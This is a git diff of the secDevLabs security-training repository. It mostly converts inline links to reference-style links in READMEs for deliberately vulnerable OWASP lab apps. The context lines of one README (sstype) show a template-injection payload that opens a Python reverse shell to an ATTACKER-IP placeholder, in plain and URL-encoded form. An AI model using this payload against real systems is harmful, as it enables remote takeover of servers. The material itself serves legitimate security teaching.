diff --git a/docs/CONTRIBUTING.md b/docs/CONTRIBUTING.md index 3af595cc1..ef8164634 100644 --- a/docs/CONTRIBUTING.md +++ b/docs/CONTRIBUTING.md @@ -53,7 +53,7 @@ To build some of the secDevLabs apps, some third party code, such as libraries o [1]:/docs/Makefile [3]:/docs/README_Template.md -[4]:/docs/PR_Template.md -[5]:/docs/Issue_Template.md +[4]:https://github.com/globocom/secDevLabs/pulls +[5]:https://github.com/globocom/secDevLabs/issues [6]:https://docs.docker.com/compose/gettingstarted/ [7]:https://docs.docker.com/compose/compose-file/ diff --git a/docs/Dirb.md b/docs/Dirb.md index fc7910c28..4690475bb 100644 --- a/docs/Dirb.md +++ b/docs/Dirb.md @@ -48,7 +48,7 @@ dirb http://localhost:5000 ./docs/common.txt ```
- +
Fig.1 - Dirb demonstration
diff --git a/docs/README_Template.md b/docs/README_Template.md index 242ac3d35..6f4b69b35 100644 --- a/docs/README_Template.md +++ b/docs/README_Template.md @@ -5,7 +5,7 @@ ( Be sure to add a banner image of your app here! )

- +

( Here's a short description of your app! ) @@ -65,25 +65,25 @@ A nice example of images to have on an attack narrative in the discovery section First time acessing the app:

- +

Found an interesting page:

- +

Started the analysis on how the app handles cookies:

- +

Confirmed the suspicion by having a look at the code!

- +

Add as many images as you can! A picture is worth more than a thousand words! @@ -104,13 +104,13 @@ Some good examples of images are as follows: Creating a payload:

- +

Delivering a payload, and results!

- +

## Secure this app @@ -127,7 +127,7 @@ How would you migitate this vulnerability? After your changes, an attacker shoul ## Contributing -We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 +We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 [secDevLabs]: https://github.com/globocom/secDevLabs [ExploitDB]: https://www.exploit-db.com/ diff --git a/owasp-top10-2016-mobile/m2/cool_games/README.md b/owasp-top10-2016-mobile/m2/cool_games/README.md index 14b21c71d..a7950f42d 100644 --- a/owasp-top10-2016-mobile/m2/cool_games/README.md +++ b/owasp-top10-2016-mobile/m2/cool_games/README.md @@ -4,7 +4,7 @@

-Cool Games is a Flutter powered mobile app that serves as the mobile version of [GamesIRADOS.com](https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2017-apps/a10/games-irados). It is built with a mobile front-end and a Golang powered back-end. +Cool Games is a Flutter powered mobile app that serves as the mobile version of [GamesIRADOS.com][GamesIRADOScom]. It is built with a mobile front-end and a Golang powered back-end. ## Index @@ -25,7 +25,7 @@ The main goal of this app is to discuss how **Insecure Data Storage** vulnerabil Before we start, it's important to mention that this app's code is divided into two parts: a back-end server, which can be found in the `server` folder, and the mobile app's code itself in the `mobile` folder. In order for the app to run as intended, the back-end server must be up and running, but no need to worry, we'll walk you through it! 😁 -To start this intentionally **insecure application**, you will need [Flutter][VS-Code-Flutter], [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you'll need to start the server, which can be done through the commands: +To start this intentionally **insecure application**, you will need [Flutter][VS-Code-Flutter], [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs][secDevLabs], you'll need to start the server, which can be done through the commands: ### Start server commands: 
@@ -178,14 +178,18 @@ How would you mitigate this vulnerability? After your changes, an attacker shoul ## PR solutions -[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests](https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+label%3A%22Cool+Games%22+label%3A%22mitigation+solution+%F0%9F%94%92%22)! +[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests][these pull requests]! ## Contributing We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 + +[GamesIRADOScom]: https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2021-apps/a9/games-irados +[secDevLabs]: https://github.com/globocom/secDevLabs [API-Version-Issue]: https://github.com/globocom/secDevLabs/blob/master/docs/api-version-issue.md [Flutter]: https://flutter.dev/docs/get-started/install [VS-Code-Flutter]: https://github.com/globocom/secDevLabs/blob/master/docs/installing-flutter.md [Docker Install]: https://docs.docker.com/install/ [Docker Compose Install]: https://docs.docker.com/compose/install/ +[these pull requests]:https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+is%3Aclosed+label%3AM2-OWASP-2016+label%3A%22Cool+Games%22 \ No newline at end of file diff --git a/owasp-top10-2016-mobile/m4/note-box/README.md b/owasp-top10-2016-mobile/m4/note-box/README.md index f25822fd3..2f5d7a3f1 100644 --- a/owasp-top10-2016-mobile/m4/note-box/README.md +++ b/owasp-top10-2016-mobile/m4/note-box/README.md 
@@ -25,7 +25,7 @@ The main goal of this app is to discuss how **Insecure Authentication** vulnerab Before we start, it's important to mention that this app's code is divided into two parts: a back-end server, which can be found in the `server` folder, and the mobile app's code itself in the `mobile` folder. In order for the app to run as intended, the back-end server must be up and running, but no need to worry, we'll walk you through it! 😁 -To start this intentionally **insecure application**, you will need [Flutter][VS-Code-Flutter], [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you'll need to start the server, which can be done through the commands: +To start this intentionally **insecure application**, you will need [Flutter][VS-Code-Flutter], [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs][secDevLabs], you'll need to start the server, which can be done through the commands: ### Start server commands: 
@@ -126,13 +126,15 @@ How would you mitigate this vulnerability? After your changes, an attacker shoul ## PR solutions -[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests](https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+label%3A%22mitigation+solution+%F0%9F%94%92%22+label%3A%22Note+Box%22)! +[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests][these pull requests]! ## Contributing We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 +[secDevLabs]: (https://github.com/globocom/secDevLabs) [Flutter]: https://flutter.dev/docs/get-started/install [VS-Code-Flutter]: ../../../docs/installing-flutter.md [Docker Install]: https://docs.docker.com/install/ [Docker Compose Install]: https://docs.docker.com/compose/install/ +[these pull requests]:https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+is%3Aclosed+label%3AM2-OWASP-2016+label%3A%22Cool+Games%22 \ No newline at end of file diff --git a/owasp-top10-2016-mobile/m5/panda_zap/README.md b/owasp-top10-2016-mobile/m5/panda_zap/README.md index 6b8a4a81d..4c82599b7 100644 --- a/owasp-top10-2016-mobile/m5/panda_zap/README.md +++ b/owasp-top10-2016-mobile/m5/panda_zap/README.md 
@@ -25,7 +25,7 @@ The main goal of this app is to discuss how **Insufficient Cryptography** vulner Before we start, it's important to mention that this app's code is divided into two parts: a back-end server, which can be found in the `server` folder, and the mobile app's code itself in the `mobile` folder. In order for the app to run as intended, the back-end server must be up and running, but no need to worry, we'll walk you through it! 😁 -To start this intentionally **insecure application**, you will need [Flutter][VS-Code-Flutter], [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you'll need to start the server, which can be done through the commands: +To start this intentionally **insecure application**, you will need [Flutter][VS-Code-Flutter], [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs][secDevLabs], you'll need to start the server, which can be done through the commands: ### Start server commands: @@ -107,7 +107,7 @@ To enter the conversation, click the message bubble. After that, it's possible t ### 🔥 -If an attacker came into possession of the device and used the [Android Debug Bridge](https://developer.android.com/studio/command-line/adb) tool to communicate with it through a Unix shell, he could inspect how the app behaves and what it logs. +If an attacker came into possession of the device and used the [Android Debug Bridge][Android Debug Bridge] tool to communicate with it through a Unix shell, he could inspect how the app behaves and what it logs. To begin, it is possible to list connected devices with the following command: @@ -167,11 +167,11 @@ Having access to the app's log, it's possible to see that a certain key seems to

-Now in possession of the key and by having a look at the app's code, it's possible to see that a [Caesar Cipher](https://en.wikipedia.org/wiki/Caesar_cipher) encryption mechanism is being used. +Now in possession of the key and by having a look at the app's code, it's possible to see that a [Caesar Cipher][Caesar Cipher] encryption mechanism is being used. In cryptography, a Caesar cipher is an encryption technique in which each letter is shifted by a fixed number of positions down the alphabet. Even though we appear to have what seems to be the shift value, logged as being the `key`, due to the fact of limited letters in the alphabet (25 in English), the cipher can easily be broken in a brute force attack. -If an attacker were connected to the same network as someone using the app, it would be possible to capture and inspect the packets being transmitted using [Wireshark](https://www.wireshark.org/). To better narrow our search, we can filter for the port the app seems to be using, `11005`, as shown by the image below: +If an attacker were connected to the same network as someone using the app, it would be possible to capture and inspect the packets being transmitted using [Wireshark][Wireshark]. To better narrow our search, we can filter for the port the app seems to be using, `11005`, as shown by the image below:

@@ -198,7 +198,8 @@ How would you mitigate this vulnerability? After your changes, the app should no ## PR solutions -[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests](https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+label%3A%22Panda+Zap%22+label%3A%22mitigation+solution+%F0%9F%94%92%22+)! +[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests][these pull requests]! + ## Contributing @@ -209,3 +210,8 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [VS-Code-Flutter]: https://github.com/globocom/secDevLabs/blob/master/docs/installing-flutter.md [Docker Install]: https://docs.docker.com/install/ [Docker Compose Install]: https://docs.docker.com/compose/install/ +[these pull requests]:https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+is%3Aclosed+label%3AM2-OWASP-2016+label%3A%22Cool+Games%22 +[secDevLabs]: (https://github.com/globocom/secDevLabs) +[Android Debug Bridge]: https://developer.android.com/studio/command-line/adb +[Caesar Cipher]: https://en.wikipedia.org/wiki/Caesar_cipher +[Wireshark]: https://www.wireshark.org/) \ No newline at end of file diff --git a/owasp-top10-2021-apps/a1/camplake-api/README.md b/owasp-top10-2021-apps/a1/camplake-api/README.md index 7c8cb8d7b..12824a671 100644 --- a/owasp-top10-2021-apps/a1/camplake-api/README.md +++ b/owasp-top10-2021-apps/a1/camplake-api/README.md 
@@ -25,7 +25,7 @@ The main goal of this app is to discuss how **Broken Access Control** vulnerabil ## Setup -To start this intentionally **insecure application**, you will need [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a1/camp-lake-api diff --git a/owasp-top10-2021-apps/a1/ecommerce-api/README.md b/owasp-top10-2021-apps/a1/ecommerce-api/README.md index 76fc0655b..290b4ffce 100644 --- a/owasp-top10-2021-apps/a1/ecommerce-api/README.md +++ b/owasp-top10-2021-apps/a1/ecommerce-api/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Broken Access Control** vulnerabil ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a1/ecommerce-api @@ -120,3 +120,4 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [app]: http://localhost:10005 [secdevlabs]: https://github.com/globocom/secDevLabs [2]: https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2017-apps/a5/ecommerce-api +[secDevLabs]: https://github.com/globocom/secDevLabs \ No newline at end of file 
diff --git a/owasp-top10-2021-apps/a1/tictactoe/README.md b/owasp-top10-2021-apps/a1/tictactoe/README.md index a47df86cc..1c438363d 100644 --- a/owasp-top10-2021-apps/a1/tictactoe/README.md +++ b/owasp-top10-2021-apps/a1/tictactoe/README.md @@ -21,7 +21,7 @@ The main goal of this app is to discuss how **Broken Access Control** vulnerabil ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh @@ -207,4 +207,5 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker compose install]: https://docs.docker.com/compose/install/ [app]: http://localhost.:10005 [secdevlabs]: https://github.com/globocom/secDevLabs +[secDevLabs]: https://github.com/globocom/secDevLabs [2]: https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2021-apps/a1/tictactoe diff --git a/owasp-top10-2021-apps/a2/snake-pro/README.md b/owasp-top10-2021-apps/a2/snake-pro/README.md index 7522e0344..8b3693212 100644 --- a/owasp-top10-2021-apps/a2/snake-pro/README.md +++ b/owasp-top10-2021-apps/a2/snake-pro/README.md 
@@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Cryptographic Failure** vulnerabil ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a2/snake-pro @@ -68,7 +68,7 @@ Additionally, the channel is being used by users to send their sensitive data is ### 🔥 -If the database is somehow exposed, all users' passwords will be leaked, as shown on these MongoDB documents. To view them, you can locally install [Robo 3T](https://robomongo.org/download) and use default credentials used in `config.yml`: +If the database is somehow exposed, all users' passwords will be leaked, as shown on these MongoDB documents. To view them, you can locally install [Robo 3T][Robo 3T] and use default credentials used in `config.yml`: ``` Database: snake_pro @@ -118,3 +118,6 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker compose install]: https://docs.docker.com/compose/install/ [app]: http://localhost:10003 [dirb]: https://tools.kali.org/web-applications/dirb +[Robo 3T]: https://robomongo.org/download +[secDevLabs]: https://github.com/globocom/secDevLabs + diff --git a/owasp-top10-2021-apps/a3/comment-killer/README.md b/owasp-top10-2021-apps/a3/comment-killer/README.md index 3db118056..5b48d6108 100644 --- a/owasp-top10-2021-apps/a3/comment-killer/README.md +++ b/owasp-top10-2021-apps/a3/comment-killer/README.md 
@@ -27,7 +27,7 @@ The main goal of this app is to discuss how **Cross-Site Scripting** vulnerabili ## Setup -To start this intentionally **insecure application**, you will need [Docker](https://docs.docker.com/get-docker/) and [Docker Compose](https://docs.docker.com/compose/install/). After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][Docker] and [Docker Compose][Docker Compose]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```bash cd secDevLabs/owasp-top10-2021-apps/a3/comment-killer @@ -96,7 +96,7 @@ func handler(c echo.Context) error { } ``` -In order to start the API, the following command can be used (you should check this [guide](https://golang.org/doc/install) if you need any help with Golang): +In order to start the API, the following command can be used (you should check this [guide][guide] if you need any help with Golang): ```sh go run main.go @@ -157,3 +157,7 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ [app]: http://localhost:10007 +[Docker]: https://docs.docker.com/get-docker/ +[Docker Compose]: https://docs.docker.com/compose/install/ +[guide]: https://golang.org/doc/install +[secDevLabs]: https://github.com/globocom/secDevLabs diff --git a/owasp-top10-2021-apps/a3/copy-n-paste/README.md b/owasp-top10-2021-apps/a3/copy-n-paste/README.md index 6ef40a6bb..b16f9741b 100644 --- a/owasp-top10-2021-apps/a3/copy-n-paste/README.md +++ b/owasp-top10-2021-apps/a3/copy-n-paste/README.md 
@@ -21,7 +21,7 @@ The main goal of this project is to discuss how **SQL Injection** vulnerabilitie ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a3/copy-n-paste @@ -106,7 +106,7 @@ Request: #### 🔥 -An attacker could now create any malicious SQL queries and send them to the API that, in theory, would be executed. For this attack narrative, [sqlmap](https://github.com/sqlmapproject/sqlmap) will be used to exemplify how an automated SQL Injection attack may be performed. +An attacker could now create any malicious SQL queries and send them to the API that, in theory, would be executed. For this attack narrative, [sqlmap][sqlmap] will be used to exemplify how an automated SQL Injection attack may be performed. To install sqlmap on a Mac you can simply type: @@ -169,6 +169,9 @@ How could you now mitigate this vulnerability? After your code modification, an We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 + +[secDevLabs]: https://github.com/globocom/secDevLabs [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ [app]: http://localhost:10001 +[sqlmap]: https://github.com/sqlmapproject/sqlmap \ No newline at end of file diff --git a/owasp-top10-2021-apps/a3/gossip-world/README.md b/owasp-top10-2021-apps/a3/gossip-world/README.md index b913a717e..8fb154726 100644 
--- a/owasp-top10-2021-apps/a3/gossip-world/README.md +++ b/owasp-top10-2021-apps/a3/gossip-world/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Cross-Site Scripting** vulnerabili ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a3/gossip-world @@ -99,7 +99,7 @@ func handler(c echo.Context) error { } ``` -To run this code simply type the following command in your terminal (you should check this [guide](https://golang.org/doc/install) if you need any help with Golang): +To run this code simply type the following command in your terminal (you should check this [guide][guide] if you need any help with Golang): ```sh go run main.go @@ -145,6 +145,8 @@ How would you mitigate this vulnerability? After your changes, an attacker shoul We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 +[guide]: https://golang.org/doc/install [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ [app]: http://localhost:10007 +[guide]: https://golang.org/doc/install diff --git a/owasp-top10-2021-apps/a3/mongection/README.md b/owasp-top10-2021-apps/a3/mongection/README.md index 86151cb6e..2e24b7bb3 100644 --- a/owasp-top10-2021-apps/a3/mongection/README.md +++ b/owasp-top10-2021-apps/a3/mongection/README.md 
@@ -21,7 +21,7 @@ The main goal of this project is to discuss how **NoSQL Injection** vulnerabilit ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a3/mongection @@ -62,7 +62,7 @@ Now that you know the purpose of this app, what could go wrong? The following se #### Lack of input validation allows injection of NoSQL queries -After reviewing [db.js](https://github.com/globocom/secDevLabs/blob/master/owasp-top10-2021-apps/a3/mongection/src/db.js) file, it was possible to see that some input from users is concatenated with NoSQL queries, as shown in the following code snippets: +After reviewing [db.js][db.js] file, it was possible to see that some input from users is concatenated with NoSQL queries, as shown in the following code snippets: ```js const existUser = await User.findOne({ email: email }); @@ -120,6 +120,8 @@ How could you now mitigate this vulnerability? After your code modification, an We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 +[secDevLabs]: https://github.com/globocom/secDevLabs [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ [app]: http://localhost:10001 +[db.js]: https://github.com/globocom/secDevLabs/blob/master/owasp-top10-2021-apps/a3/mongection/src/db.js \ No newline at end of file 
diff --git a/owasp-top10-2021-apps/a3/sstype/README.md b/owasp-top10-2021-apps/a3/sstype/README.md index db055c58a..ca702d007 100644 --- a/owasp-top10-2021-apps/a3/sstype/README.md +++ b/owasp-top10-2021-apps/a3/sstype/README.md @@ -21,7 +21,7 @@ The main goal of this project is to discuss how **Server-Side Template Injection ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a3/sstype 
@@ -127,7 +127,7 @@ Don't forget to replace `ATTACKER-IP` and `ATTACKER-PORT` below! {%import os%}{{os.popen("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER-IP\",ATTACKER-PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'").read()}} ``` -However, as there might be some special characters in this string, we need to escape them before injecting it in the vulnerable application (this [online URL encoder](https://www.urlencoder.org/) may help) and hope for a shell: +However, as there might be some special characters in this string, we need to escape them before injecting it in the vulnerable application (this [online URL encoder][online URL encoder] may help) and hope for a shell: ```python %7B%25import%20os%25%7D%7B%7Bos.popen%28%22python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%5C%22ATTACKER-IP%5C%22%2CATTACKER-PORT%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%5C%22%2Fbin%2Fbash%5C%22%2C%5C%22-i%5C%22%5D%29%3B%27%22%29.read%28%29%7D%7D @@ -147,6 +147,8 @@ How could you now mitigate this vulnerability? After your code modification, an We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 +[secDevLabs]: https://github.com/globocom/secDevLabs [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ [app]: http://localhost:10001 +[online URL encoder]: https://www.urlencoder.org/ diff --git a/owasp-top10-2021-apps/a3/streaming/README.md b/owasp-top10-2021-apps/a3/streaming/README.md index a321c47e3..087d26da5 100644 --- a/owasp-top10-2021-apps/a3/streaming/README.md 
+++ b/owasp-top10-2021-apps/a3/streaming/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Cross-Site Scripting** vulnerabili ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a3/streaming @@ -106,4 +106,5 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ +[secDevLabs]: https://github.com/globocom/secDevLabs [app]: http://localhost:10007 diff --git a/owasp-top10-2021-apps/a5/misconfig-wordpress/README.md b/owasp-top10-2021-apps/a5/misconfig-wordpress/README.md index ace652ed1..c84b9eeb4 100644 --- a/owasp-top10-2021-apps/a5/misconfig-wordpress/README.md +++ b/owasp-top10-2021-apps/a5/misconfig-wordpress/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Security Misconfiguration** vulner ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a5/misconfig-wordpress 
@@ -69,7 +69,7 @@ An attacker could try to log in with the username: `admin` and realize, through ### 🔥 -At this moment, an attacker could use [Burp Suite](https://portswigger.net/burp) to perform a brute force attack using this [wordlist] (if you need any help setting up your proxy you should check this [guide](https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp)). To do so, after finding the login POST request, right click and send to Intruder, as shown below: +At this moment, an attacker could use [Burp Suite][Burp Suite] to perform a brute force attack using this [wordlist] (if you need any help setting up your proxy you should check this [guide][guide]). To do so, after finding the login POST request, right click and send to Intruder, as shown below:

@@ -222,9 +222,12 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ +[secDevLabs]: https://github.com/globocom/secDevLabs [app]: http://localhost:8000 [wordlist]: https://github.com/danielmiessler/SecLists/blob/master/Passwords/UserPassCombo-Jay.txt [wpscan]: https://wpscan.org/ [malicious code]: https://www.exploit-db.com/exploits/44949 [nikto]: https://cirt.net/Nikto2 [searchsploit]: https://www.exploit-db.com/searchsploit +[Burp Suite]: https://portswigger.net/burp +[guide]: https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp diff --git a/owasp-top10-2021-apps/a5/stegonography/README.md b/owasp-top10-2021-apps/a5/stegonography/README.md index d59d205cb..559cd791c 100644 --- a/owasp-top10-2021-apps/a5/stegonography/README.md +++ b/owasp-top10-2021-apps/a5/stegonography/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Security Misconfiguration** vulner ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a5/stegonography 
@@ -135,7 +135,9 @@ How would you mitigate this vulnerability? After your changes, an attacker shoul We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 + [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ +[secDevLabs]: https://github.com/globocom/secDevLabs [app]: http://localhost:10006 [dirb]: https://tools.kali.org/web-applications/dirb diff --git a/owasp-top10-2021-apps/a5/vinijr-blog/README.md b/owasp-top10-2021-apps/a5/vinijr-blog/README.md index 7dde735a1..3bd7291c8 100644 --- a/owasp-top10-2021-apps/a5/vinijr-blog/README.md +++ b/owasp-top10-2021-apps/a5/vinijr-blog/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **XXE** vulnerabilities can be explo ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a5/vinijr-blog 
@@ -54,11 +54,11 @@ After reviewing the inputs from the app, it is possible to identify that the sec -Using [Burp Suite](https://portswigger.net/burp) proxy to intercept this request (POST to contact.php) reveals that the message is being built using an XML (if you need any help setting up your proxy you should check this [guide](https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp)): +Using [Burp Suite][Burp Suite] proxy to intercept this request (POST to contact.php) reveals that the message is being built using an XML (if you need any help setting up your proxy you should check this [guide][guide]: -To replicate this POST using [curl](https://curl.haxx.se/), create the following file `payload.xml`: +To replicate this POST using [curl][curl], create the following file `payload.xml`: ```XML @@ -82,7 +82,7 @@ By checking the source code of the [file](../vinijr-blog/app/contact.php), it is ### 🔥 -As no validation is being used to avoid [ENTITIES](https://www.w3schools.com/xml/xml_dtd_entities.asp) being sent to the PHP file, an attacker could create the following `evilxml.xml` to perform a XXE: +As no validation is being used to avoid [ENTITIES][ENTITIES] being sent to the PHP file, an attacker could create the following `evilxml.xml` to perform a XXE: ```XML @@ -121,4 +121,9 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ +[secDevLabs]: https://github.com/globocom/secDevLabs [app]: http://localhost:10004 +[Burp Suite]: https://portswigger.net/burp +[guide]: https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp +[curl]: https://curl.haxx.se/ +[ENTITIES]: https://www.w3schools.com/xml/xml_dtd_entities.asp \ No newline at end of file 
